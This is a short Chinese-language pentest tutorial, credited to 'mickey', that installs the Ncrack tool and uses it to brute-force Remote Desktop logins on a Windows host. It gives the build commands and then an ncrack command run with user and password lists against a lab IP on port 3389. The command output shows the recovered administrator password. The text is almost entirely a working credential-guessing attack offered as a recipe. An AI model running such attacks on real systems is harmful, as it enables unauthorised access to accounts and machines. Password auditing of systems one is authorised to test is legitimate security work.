来源:mickey
1.安装依赖包

mickey@pentestbox:~# sudo apt-get install build-essential libssl-dev libssh-dev

2.下载/编译/安装
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
make install
3.破解Windows英文版操作系统的终端服务
mickey@pentestbox:~# ncrack -vv -U windows.user -P windows.pwd 192.168.1.107:3389,CL=1 -f
Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-22 06:47 EDT
Discovered credentials on rdp://192.168.1.107:3389 ‘administrator’ ‘mickeymouse’
rdp://192.168.1.107:3389 finished.
Discovered credentials for rdp on 192.168.1.107 3389/tcp:
192.168.1.107 3389/tcp rdp: ‘administrator’ ‘mickeymouse’
Ncrack done: 1 service scanned in 51.01 seconds.
Probes sent: 10 | timed-out: 0 | prematurely-closed: 0
Ncrack finished.